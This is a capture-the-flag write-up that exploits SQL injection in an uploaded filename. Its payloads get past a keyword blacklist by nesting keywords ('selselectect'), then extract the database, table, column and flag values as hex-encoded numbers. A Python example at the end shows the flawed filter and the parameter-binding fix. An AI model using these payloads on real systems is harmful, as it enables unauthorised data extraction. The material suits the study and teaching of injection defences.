Register a user first.
PS: This is not a file-upload vulnerability; the SQL injection is in the filename.
Inject at the filename.
When the filename contains both digits and letters, the page displays only the number.
sql'+123+'.jpg
After refreshing, the page shows:
123
Dump the database name:
'+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg
31277325825392 -> 7765625f7570 -> web_up
1819238756 -> 6c6f6164 -> load
Concatenated: web_upload
Dump the tables:
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema='web_upload')),1,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema='web_upload')),13,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema='web_upload')),25,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema='web_upload')),37,12),16,10))+'.jpg
112602976187180 -> 66696c65732c -> files,
114784820031327 -> 68656c6c6f5f -> hello_
112615676665705 -> 666c61675f69 -> flag_i
126853610566245 -> 735f68657265 -> s_here
48848364724837 -> 2c6d656d6265 -> ,membe
29299 -> 7273 -> rs
Concatenated: files,hello_flag_is_here,members
Dump the columns:
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(column_name) frofromm information_schema.columns where table_name='hello_flag_is_here')),1,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt group_concat(column_name) frofromm information_schema.columns where table_name='hello_flag_is_here')),13,12),16,10))+'.jpg
115858377367398 -> 695f616d5f66 -> i_am_f
7102823 -> 6c6167 -> lag
Concatenated: i_am_flag
Dump the field:
sql'+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),1,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),13,12),16,10))+'.jpg
sql'+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),25,12),16,10))+'.jpg
36427215695199 -> 21215f406d5f -> !!_@m_
92806431727430 -> 54682e655f46 -> Th.e_F
560750951 -> 216c6167 -> !lag
!!_@m_Th.e_F!lag
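The root cause behind the "selselectect" / "frofromm" payloads above is a single-pass keyword blacklist combined with string-concatenated SQL. The following is an added example, not code from the challenge or the writeup; it assumes a blacklist of four keywords and uses an in-memory SQLite table to stand in for the target's files table. It shows the filter handing back a clean `select`, the concatenated query turning the filename into the number 123 (the same effect the writeup observes), and parameter binding storing the filename verbatim.

```python
import re
import sqlite3

# Constructed payload in the shape used in the writeup: the keyword "select"
# is written with a copy of itself in the middle, so deleting one occurrence
# leaves a valid "select" behind.
PAYLOAD = "sql'+(selselectect 123)+'.jpg"
KEYWORDS = ("select", "from", "union", "where")  # assumed blacklist


def naive_keyword_filter(value: str) -> str:
    """Single-pass blacklist filter (assumed model of the target's filter):
    each keyword is deleted once and the result is never re-scanned."""
    for kw in KEYWORDS:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT)")
    return conn


def store_vulnerable(conn: sqlite3.Connection, filename: str) -> None:
    """Vulnerable pattern: blacklist, then splice the name into SQL text.
    'sql'+(select 123)+'.jpg' is evaluated as arithmetic: 0 + 123 + 0."""
    sql = "INSERT INTO files(name) VALUES ('%s')" % naive_keyword_filter(filename)
    conn.execute(sql)


def store_hardened(conn: sqlite3.Connection, filename: str) -> None:
    """Fix: bind the filename as a parameter, so it is data and never SQL.
    No keyword filter is needed; the payload is stored as a plain string."""
    conn.execute("INSERT INTO files(name) VALUES (?)", (filename,))


def stored_name(conn: sqlite3.Connection) -> str:
    return conn.execute("SELECT name FROM files ORDER BY id DESC LIMIT 1").fetchone()[0]


def demo() -> tuple:
    """Returns (filtered payload, value stored by the vulnerable path,
    value stored by the hardened path)."""
    filtered = naive_keyword_filter(PAYLOAD)
    vuln = new_db()
    store_vulnerable(vuln, PAYLOAD)
    safe = new_db()
    store_hardened(safe, PAYLOAD)
    return filtered, stored_name(vuln), stored_name(safe)


if __name__ == "__main__":
    print(demo())
```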